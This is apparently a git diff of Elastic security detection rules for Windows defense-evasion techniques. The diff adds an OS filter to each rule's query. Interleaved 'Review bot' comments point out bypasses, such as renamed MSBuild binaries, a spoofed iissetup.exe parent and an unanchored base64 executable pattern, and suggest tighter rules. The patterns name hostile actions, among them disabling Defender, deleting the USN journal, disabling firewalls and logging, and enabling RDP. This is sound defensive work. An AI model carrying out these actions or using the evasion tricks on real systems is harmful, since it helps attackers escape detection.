 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -87,7 +87,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 (process.name : ("powershell.exe", "pwsh.exe", "powershell_ise.exe") or process.pe.original_file_name in ("powershell.exe", "pwsh.dll", "powershell_ise.exe")) and process.args : ("*Add-MpPreference*", "*Set-MpPreference*") and process.args : ("*-Exclusion*")
diff --git a/rules/windows/defense_evasion_delete_volume_usn_journal_with_fsutil.toml b/rules/windows/defense_evasion_delete_volume_usn_journal_with_fsutil.toml
index 197b6a2f5..9a2ca3927 100644
--- a/rules/windows/defense_evasion_delete_volume_usn_journal_with_fsutil.toml
+++ b/rules/windows/defense_evasion_delete_volume_usn_journal_with_fsutil.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -29,7 +29,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 (process.name : "fsutil.exe" or process.pe.original_file_name == "fsutil.exe") and process.args : "deletejournal" and process.args : "usn"
 '''
diff --git a/rules/windows/defense_evasion_disable_posh_scriptblocklogging.toml b/rules/windows/defense_evasion_disable_posh_scriptblocklogging.toml
index 4f1ce8562..ec8cc3905 100644
--- a/rules/windows/defense_evasion_disable_posh_scriptblocklogging.toml
+++ b/rules/windows/defense_evasion_disable_posh_scriptblocklogging.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/02/06"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -76,7 +76,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-registry where event.type == "change" and
+registry where host.os.type == "windows" and event.type == "change" and
 registry.path : (
 "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\\EnableScriptBlockLogging",
 "\\REGISTRY\\MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\\EnableScriptBlockLogging"
diff --git a/rules/windows/defense_evasion_disable_windows_firewall_rules_with_netsh.toml b/rules/windows/defense_evasion_disable_windows_firewall_rules_with_netsh.toml
index 4e0678b51..6154dd858 100644
--- a/rules/windows/defense_evasion_disable_windows_firewall_rules_with_netsh.toml
+++ b/rules/windows/defense_evasion_disable_windows_firewall_rules_with_netsh.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -67,7 +67,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 process.name : "netsh.exe" and
 (
 (process.args : "disable" and process.args : "firewall" and process.args : "set") or
diff --git a/rules/windows/defense_evasion_disabling_windows_defender_powershell.toml b/rules/windows/defense_evasion_disabling_windows_defender_powershell.toml
index a15bb59f2..50fa47a27 100644
--- a/rules/windows/defense_evasion_disabling_windows_defender_powershell.toml
+++ b/rules/windows/defense_evasion_disabling_windows_defender_powershell.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -75,7 +75,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 (process.name : ("powershell.exe", "pwsh.exe", "powershell_ise.exe") or process.pe.original_file_name in ("powershell.exe", "pwsh.dll", "powershell_ise.exe")) and process.args : "Set-MpPreference" and process.args : ("-Disable*", "Disabled", "NeverSend", "-Exclusion*")
 '''
diff --git a/rules/windows/defense_evasion_disabling_windows_logs.toml b/rules/windows/defense_evasion_disabling_windows_logs.toml
index 475862b77..26cc55c2c 100644
--- a/rules/windows/defense_evasion_disabling_windows_logs.toml
+++ b/rules/windows/defense_evasion_disabling_windows_logs.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/01/19"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic", "Ivan Ninichuck", "Austin Songer"]
@@ -72,7 +72,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 (
 ((process.name:"logman.exe" or process.pe.original_file_name == "Logman.exe") and process.args : "EventLog-*" and process.args : ("stop", "delete")) or
diff --git a/rules/windows/defense_evasion_dns_over_https_enabled.toml b/rules/windows/defense_evasion_dns_over_https_enabled.toml
index bc51225ec..1459bc5d5 100644
--- a/rules/windows/defense_evasion_dns_over_https_enabled.toml
+++ b/rules/windows/defense_evasion_dns_over_https_enabled.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Austin Songer"]
@@ -34,7 +34,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-registry where event.type in ("creation", "change") and
+registry where host.os.type == "windows" and event.type in ("creation", "change") and
 (registry.path : "*\\SOFTWARE\\Policies\\Microsoft\\Edge\\BuiltInDnsClientEnabled" and registry.data.strings : "1") or (registry.path : "*\\SOFTWARE\\Google\\Chrome\\DnsOverHttpsMode" and
diff --git a/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml b/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml
index 7bc221d65..07fcf22a1 100644
--- a/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml
+++ b/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -26,7 +26,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 process.name : ("csc.exe", "vbc.exe") and process.parent.name : ("wscript.exe", "mshta.exe", "cscript.exe", "wmic.exe", "svchost.exe", "rundll32.exe", "cmstp.exe", "regsvr32.exe")
 '''
diff --git a/rules/windows/defense_evasion_enable_inbound_rdp_with_netsh.toml b/rules/windows/defense_evasion_enable_inbound_rdp_with_netsh.toml
index e67c8f102..e7a8da1c4 100644
--- a/rules/windows/defense_evasion_enable_inbound_rdp_with_netsh.toml
+++ b/rules/windows/defense_evasion_enable_inbound_rdp_with_netsh.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -73,7 +73,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 (process.name : "netsh.exe" or process.pe.original_file_name == "netsh.exe") and process.args : ("localport=3389", "RemoteDesktop", "group=\"remote desktop\"") and process.args : ("action=allow", "enable=Yes", "enable")
diff --git a/rules/windows/defense_evasion_enable_network_discovery_with_netsh.toml b/rules/windows/defense_evasion_enable_network_discovery_with_netsh.toml
index c2ad1d277..51036b633 100644
--- a/rules/windows/defense_evasion_enable_network_discovery_with_netsh.toml
+++ b/rules/windows/defense_evasion_enable_network_discovery_with_netsh.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -69,7 +69,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 process.name : "netsh.exe" and process.args : ("firewall", "advfirewall") and process.args : "group=Network Discovery" and process.args : "enable=Yes"
 '''
diff --git a/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml b/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml
index 376f8e772..7df65a5a2 100644
--- a/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml
+++ b/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -30,7 +30,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 process.executable : ("?:\\Windows\\SysWOW64\\control.exe", "?:\\Windows\\System32\\control.exe") and process.command_line : ("*.jpg*",
diff --git a/rules/windows/defense_evasion_execution_lolbas_wuauclt.toml b/rules/windows/defense_evasion_execution_lolbas_wuauclt.toml
index f6008e58e..179f905c0 100644
--- a/rules/windows/defense_evasion_execution_lolbas_wuauclt.toml
+++ b/rules/windows/defense_evasion_execution_lolbas_wuauclt.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -32,7 +32,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 (process.pe.original_file_name == "wuauclt.exe" or process.name : "wuauclt.exe") and /* necessary windows update client args to load a dll */ process.args : "/RunHandlerComServer" and process.args : "/UpdateDeploymentProvider" and
diff --git a/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml b/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml
index d87548e67..88e55bcf2 100644
--- a/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml
+++ b/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
maturity = "production"
min_stack_comments = "New fields added: required_fields, related_integrations, setup"
min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
[rule]
author = ["Elastic"]
@@ -94,7 +94,7 @@ timestamp_override = "event.ingested"
type = "eql"
query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
process.name : "MSBuild.exe" and
process.parent.name : ("eqnedt32.exe",
"excel.exe",
diff --git a/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml b/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml
index de1539996..1bbbb00f7 100755
--- a/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml
+++ b/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
maturity = "production"
min_stack_comments = "New fields added: required_fields, related_integrations, setup"
min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
[rule]
author = ["Elastic"]
@@ -30,7 +30,7 @@ timestamp_override = "event.ingested"
type = "eql"
query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
(process.name : "MSBuild.exe" or process.pe.original_file_name == "MSBuild.exe") and
process.parent.name : ("cmd.exe", "powershell.exe", "pwsh.exe", "powershell_ise.exe", "cscript.exe", "wscript.exe", "mshta.exe")
'''
diff --git a/rules/windows/defense_evasion_execution_msbuild_started_by_system_process.toml b/rules/windows/defense_evasion_execution_msbuild_started_by_system_process.toml
index 4db7a9a2d..019238357 100644
--- a/rules/windows/defense_evasion_execution_msbuild_started_by_system_process.toml
+++ b/rules/windows/defense_evasion_execution_msbuild_started_by_system_process.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
maturity = "production"
min_stack_comments = "New fields added: required_fields, related_integrations, setup"
min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
[rule]
author = ["Elastic"]
@@ -30,7 +30,7 @@ timestamp_override = "event.ingested"
type = "eql"
query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
process.name : "MSBuild.exe" and
process.parent.name : ("explorer.exe", "wmiprvse.exe")
'''
diff --git a/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml b/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml
index 8a1d7bad8..ee1cf4892 100644
--- a/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml
+++ b/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
maturity = "production"
min_stack_comments = "New fields added: required_fields, related_integrations, setup"
min_stack_version = "8.3.0"
-updated_date = "2023/02/09"
+updated_date = "2023/03/02"
[rule]
author = ["Elastic"]
@@ -80,7 +80,7 @@ timestamp_override = "event.ingested"
type = "eql"
query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
process.pe.original_file_name == "MSBuild.exe" and not process.name : "MSBuild.exe"
'''
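Review bot: The `process.name : "MSBuild.exe" and` context line in the MSBuild-from-system-process hunk checks only the on-disk name, so a renamed copy of MSBuild launched from explorer.exe or wmiprvse.exe escapes this rule, whereas the started-by-script rule in this same change pairs the name with the PE header: `(process.name : "MSBuild.exe" or process.pe.original_file_name == "MSBuild.exe") and`. Using the same two-field form here would make the two rules consistent; the started-by-office-app rule earlier in the change has the identical single-field check and could be updated the same way. The renamed-MSBuild rule in the following hunk would still fire on the renamed binary, but without the suspicious-parent context this rule is meant to add.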
diff --git a/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml b/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml
index 110228ee6..024bc3351 100644
--- a/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml
+++ b/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
maturity = "production"
min_stack_comments = "New fields added: required_fields, related_integrations, setup"
min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
[rule]
author = ["Elastic"]
@@ -36,7 +36,7 @@ timestamp_override = "event.ingested"
type = "eql"
query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
process.parent.name : "MSBuild.exe" and
process.name : ("csc.exe", "iexplore.exe", "powershell.exe")
'''
diff --git a/rules/windows/defense_evasion_execution_suspicious_explorer_winword.toml b/rules/windows/defense_evasion_execution_suspicious_explorer_winword.toml
index 6ffafbe65..bd8bf99ef 100644
--- a/rules/windows/defense_evasion_execution_suspicious_explorer_winword.toml
+++ b/rules/windows/defense_evasion_execution_suspicious_explorer_winword.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
maturity = "production"
min_stack_comments = "New fields added: required_fields, related_integrations, setup"
min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
[rule]
author = ["Elastic"]
@@ -30,7 +30,7 @@ timestamp_override = "event.ingested"
type = "eql"
query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
process.pe.original_file_name in ("WinWord.exe", "EXPLORER.EXE", "w3wp.exe", "DISM.EXE") and
not (process.name : ("winword.exe", "explorer.exe", "w3wp.exe", "Dism.exe") or
process.executable : ("?:\\Windows\\explorer.exe",
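Review bot: `process.pe.original_file_name in ("WinWord.exe", "EXPLORER.EXE", "w3wp.exe", "DISM.EXE")` in the suspicious-explorer/winword hunk uses EQL's case-sensitive `in`, while the `not process.name : (...)` exclusion on the next line is case-insensitive; the mixed casing of the list suggests it was copied from current PE headers, so any data source that normalises this field, or a future build that changes the header casing, silently drops the match. The case-insensitive form, `process.pe.original_file_name in~ ("WinWord.exe", "EXPLORER.EXE", "w3wp.exe", "DISM.EXE") and`, makes both sides of the comparison behave the same way (I believe `in~` is supported on the 8.3 minimum stack this rule declares — worth confirming before changing). The `process.executable` exclusion list continues outside the hunk.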
diff --git a/rules/windows/defense_evasion_execution_windefend_unusual_path.toml b/rules/windows/defense_evasion_execution_windefend_unusual_path.toml
index 10cb8f36c..2caa87b0f 100644
--- a/rules/windows/defense_evasion_execution_windefend_unusual_path.toml
+++ b/rules/windows/defense_evasion_execution_windefend_unusual_path.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
maturity = "production"
min_stack_comments = "New fields added: required_fields, related_integrations, setup"
min_stack_version = "8.3.0"
-updated_date = "2023/01/19"
+updated_date = "2023/02/22"
[rule]
author = ["Elastic", "Dennis Perto"]
@@ -34,7 +34,7 @@ timestamp_override = "event.ingested"
type = "eql"
query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
(
(process.pe.original_file_name == "MsMpEng.exe" and not process.name : "MsMpEng.exe") or
(process.name : "MsMpEng.exe" and not
diff --git a/rules/windows/defense_evasion_file_creation_mult_extension.toml b/rules/windows/defense_evasion_file_creation_mult_extension.toml
index 1ad519aba..ded93fc8b 100644
--- a/rules/windows/defense_evasion_file_creation_mult_extension.toml
+++ b/rules/windows/defense_evasion_file_creation_mult_extension.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
maturity = "production"
min_stack_comments = "New fields added: required_fields, related_integrations, setup"
min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
[rule]
author = ["Elastic"]
@@ -30,7 +30,7 @@ timestamp_override = "event.ingested"
type = "eql"
query = '''
-file where event.type == "creation" and file.extension : "exe" and
+file where host.os.type == "windows" and event.type == "creation" and file.extension : "exe" and
file.name regex~ """.*\.(vbs|vbe|bat|js|cmd|wsh|ps1|pdf|docx?|xlsx?|pptx?|txt|rtf|gif|jpg|png|bmp|hta|txt|img|iso)\.exe""" and
not (process.executable : ("?:\\Windows\\System32\\msiexec.exe", "C:\\Users\\*\\QGIS_SCCM\\Files\\QGIS-OSGeo4W-*-Setup-x86_64.exe") and
file.path : "?:\\Program Files\\QGIS *\\apps\\grass\\*.exe") and
diff --git a/rules/windows/defense_evasion_from_unusual_directory.toml b/rules/windows/defense_evasion_from_unusual_directory.toml
index b0f700a46..5c6f205e0 100644
--- a/rules/windows/defense_evasion_from_unusual_directory.toml
+++ b/rules/windows/defense_evasion_from_unusual_directory.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
maturity = "production"
min_stack_comments = "New fields added: required_fields, related_integrations, setup"
min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
[rule]
author = ["Elastic"]
@@ -29,7 +29,7 @@ timestamp_override = "event.ingested"
type = "eql"
query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
/* add suspicious execution paths here */
process.executable : ("C:\\PerfLogs\\*.exe","C:\\Users\\Public\\*.exe","C:\\Windows\\Tasks\\*.exe","C:\\Intel\\*.exe","C:\\AMD\\Temp\\*.exe","C:\\Windows\\AppReadiness\\*.exe",
"C:\\Windows\\ServiceState\\*.exe","C:\\Windows\\security\\*.exe","C:\\Windows\\IdentityCRL\\*.exe","C:\\Windows\\Branding\\*.exe","C:\\Windows\\csc\\*.exe",
diff --git a/rules/windows/defense_evasion_hide_encoded_executable_registry.toml b/rules/windows/defense_evasion_hide_encoded_executable_registry.toml
index abe09c886..02c6e8e63 100644
--- a/rules/windows/defense_evasion_hide_encoded_executable_registry.toml
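Review bot: The `file.name regex~` alternation in the multiple-extension hunk lists `txt` twice (`...|pptx?|txt|rtf|...|hta|txt|img|iso`), which is harmless but suggests the list was never re-read; drop the second occurrence. More importantly, the exclusion on the following line is anchored on `C:\\Users\\*\\QGIS_SCCM\\Files\\QGIS-OSGeo4W-*-Setup-x86_64.exe`, a user-writable path, so any binary named to fit that glob that writes a double-extension `.exe` under `?:\Program Files\QGIS *\apps\grass\` is suppressed. If the data source populates signature fields (the process-termination rule in this same change relies on `process.code_signature.trusted`), tightening the exclusion to `... and process.code_signature.trusted == true and file.path : "?:\\Program Files\\QGIS *\\apps\\grass\\*.exe") and` keeps the QGIS false positive out without trusting a path under `C:\Users`. The query continues past the hunk.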
+++ b/rules/windows/defense_evasion_hide_encoded_executable_registry.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
maturity = "production"
min_stack_comments = "New fields added: required_fields, related_integrations, setup"
min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
[rule]
author = ["Elastic"]
@@ -25,7 +25,7 @@ timestamp_override = "event.ingested"
type = "eql"
query = '''
-registry where
+registry where host.os.type == "windows" and
/* update here with encoding combinations */
registry.data.strings : "TVqQAAMAAAAEAAAA*"
'''
diff --git a/rules/windows/defense_evasion_iis_httplogging_disabled.toml b/rules/windows/defense_evasion_iis_httplogging_disabled.toml
index b1ba5d63d..806c63d8b 100644
--- a/rules/windows/defense_evasion_iis_httplogging_disabled.toml
+++ b/rules/windows/defense_evasion_iis_httplogging_disabled.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
maturity = "production"
min_stack_comments = "New fields added: required_fields, related_integrations, setup"
min_stack_version = "8.3.0"
-updated_date = "2023/02/09"
+updated_date = "2023/03/02"
[rule]
author = ["Elastic"]
@@ -64,7 +64,7 @@ timestamp_override = "event.ingested"
type = "eql"
query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
(process.name : "appcmd.exe" or process.pe.original_file_name == "appcmd.exe") and
process.args : "/dontLog*:*True" and
not process.parent.name : "iissetup.exe"
diff --git a/rules/windows/defense_evasion_injection_msbuild.toml b/rules/windows/defense_evasion_injection_msbuild.toml
index 08cc0cacf..d5bee584d 100755
--- a/rules/windows/defense_evasion_injection_msbuild.toml
+++ b/rules/windows/defense_evasion_injection_msbuild.toml
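Review bot: `registry.data.strings : "TVqQAAMAAAAEAAAA*"` in the encoded-executable hunk is anchored to the start of the value and covers only the most common DOS stub, so a payload stored with any prefix (one padding character, a marker string, a second concatenated blob) or built with a different stub is not matched; the existing `/* update here with encoding combinations */` comment acknowledges this, but nothing has been added since. A first step is to drop the anchor, `registry.data.strings : "*TVqQAAMAAAAEAAAA*"`, and then add the encodings of the other common MZ stubs and of the same stub at the two other base64 offsets. The `host.os.type` predicate added here is consistent with the rest of the change.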
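Review bot: `not process.parent.name : "iissetup.exe"` in the IIS logging hunk excludes on the parent image name alone, which the attacker controls: running appcmd from any process renamed `iissetup.exe` disables HTTP logging without an alert. Anchoring the exclusion on the install location instead, `not process.parent.executable : "?:\\Windows\\System32\\inetsrv\\iissetup.exe"` (confirm the path on a host with the IIS role installed), keeps the false-positive suppression while removing the trivial bypass. The `process.args : "/dontLog*:*True"` wildcard is case-insensitive and tolerates extra characters around the colon, so that part of the query is fine as written.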
@@ -4,7 +4,7 @@ integration = ["windows"]
maturity = "production"
min_stack_comments = "New fields added: required_fields, related_integrations, setup"
min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
[rule]
author = ["Elastic"]
@@ -25,7 +25,7 @@ timestamp_override = "event.ingested"
type = "query"
query = '''
-process.name:MSBuild.exe and event.action:"CreateRemoteThread detected (rule: CreateRemoteThread)"
+process.name:MSBuild.exe and host.os.type:windows and event.action:"CreateRemoteThread detected (rule: CreateRemoteThread)"
'''
diff --git a/rules/windows/defense_evasion_installutil_beacon.toml b/rules/windows/defense_evasion_installutil_beacon.toml
index c47c9f4f3..4e270d971 100644
--- a/rules/windows/defense_evasion_installutil_beacon.toml
+++ b/rules/windows/defense_evasion_installutil_beacon.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
maturity = "production"
min_stack_comments = "New fields added: required_fields, related_integrations, setup"
min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
[rule]
author = ["Elastic"]
@@ -27,8 +27,8 @@ query = '''
/* the benefit of doing this as an eql sequence vs kql is this will limit to alerting only on the first network connection */
sequence by process.entity_id
- [process where event.type == "start" and process.name : "installutil.exe"]
- [network where process.name : "installutil.exe" and network.direction : ("outgoing", "egress")]
+ [process where host.os.type == "windows" and event.type == "start" and process.name : "installutil.exe"]
+ [network where host.os.type == "windows" and process.name : "installutil.exe" and network.direction : ("outgoing", "egress")]
'''
diff --git a/rules/windows/defense_evasion_masquerading_as_elastic_endpoint_process.toml b/rules/windows/defense_evasion_masquerading_as_elastic_endpoint_process.toml
index 7e04d9d89..fd0ffc1da 100644
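Review bot: `sequence by process.entity_id` in the installutil hunk has no `maxspan`, so the network stage can pair with a process start from hours earlier and the sequence state is held indefinitely, while the mshta and WerFault beacon rules in this same change do bound their sequences. The network stage also has no loopback or private-range exclusion, unlike `msbuild_making_network_connections` (`not cidrmatch(destination.ip, "127.0.0.1", "::1")`) and `msxsl_network` in this change, so a local COM/RPC connection from InstallUtil will alert. Suggest `sequence by process.entity_id with maxspan=5m` and appending `and not cidrmatch(destination.ip, "127.0.0.0/8", "::1")` to the network stage, keeping the leading comment about alerting only on the first connection accurate.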
--- a/rules/windows/defense_evasion_masquerading_as_elastic_endpoint_process.toml
+++ b/rules/windows/defense_evasion_masquerading_as_elastic_endpoint_process.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
maturity = "production"
min_stack_comments = "New fields added: required_fields, related_integrations, setup"
min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
[rule]
author = ["Elastic"]
@@ -29,7 +29,7 @@ timestamp_override = "event.ingested"
type = "eql"
query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
process.name : ("esensor.exe", "elastic-endpoint.exe") and
process.parent.executable != null and
/* add FPs here */
diff --git a/rules/windows/defense_evasion_masquerading_renamed_autoit.toml b/rules/windows/defense_evasion_masquerading_renamed_autoit.toml
index dd108e0d7..e68d9ee7f 100644
--- a/rules/windows/defense_evasion_masquerading_renamed_autoit.toml
+++ b/rules/windows/defense_evasion_masquerading_renamed_autoit.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
maturity = "production"
min_stack_comments = "New fields added: required_fields, related_integrations, setup"
min_stack_version = "8.3.0"
-updated_date = "2023/02/09"
+updated_date = "2023/03/02"
[rule]
author = ["Elastic"]
@@ -79,7 +79,7 @@ timestamp_override = "event.ingested"
type = "eql"
query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
process.pe.original_file_name : "AutoIt*.exe" and not process.name : "AutoIt*.exe"
'''
diff --git a/rules/windows/defense_evasion_masquerading_suspicious_werfault_childproc.toml b/rules/windows/defense_evasion_masquerading_suspicious_werfault_childproc.toml
index 2a0c2aafb..4ea706f05 100644
--- a/rules/windows/defense_evasion_masquerading_suspicious_werfault_childproc.toml
+++ b/rules/windows/defense_evasion_masquerading_suspicious_werfault_childproc.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
maturity = "production"
min_stack_comments = "New fields added: required_fields, related_integrations, setup"
min_stack_version = "8.3.0"
-updated_date = "2022/12/21"
+updated_date = "2023/02/22"
[rule]
author = ["Elastic"]
@@ -36,7 +36,7 @@ timestamp_override = "event.ingested"
type = "eql"
query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
process.parent.name : "WerFault.exe" and
diff --git a/rules/windows/defense_evasion_masquerading_trusted_directory.toml b/rules/windows/defense_evasion_masquerading_trusted_directory.toml
index 019d73061..150922343 100644
--- a/rules/windows/defense_evasion_masquerading_trusted_directory.toml
+++ b/rules/windows/defense_evasion_masquerading_trusted_directory.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
maturity = "production"
min_stack_comments = "New fields added: required_fields, related_integrations, setup"
min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
[rule]
author = ["Elastic"]
@@ -30,7 +30,7 @@ timestamp_override = "event.ingested"
type = "eql"
query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
process.executable : "C:\\*Program*Files*\\*.exe" and
not process.executable : ("C:\\Program Files\\*.exe", "C:\\Program Files (x86)\\*.exe", "C:\\Users\\*.exe", "C:\\ProgramData\\*.exe")
'''
diff --git a/rules/windows/defense_evasion_masquerading_werfault.toml b/rules/windows/defense_evasion_masquerading_werfault.toml
index 33ddf6c8d..eaab7d9d2 100644
--- a/rules/windows/defense_evasion_masquerading_werfault.toml
+++ b/rules/windows/defense_evasion_masquerading_werfault.toml
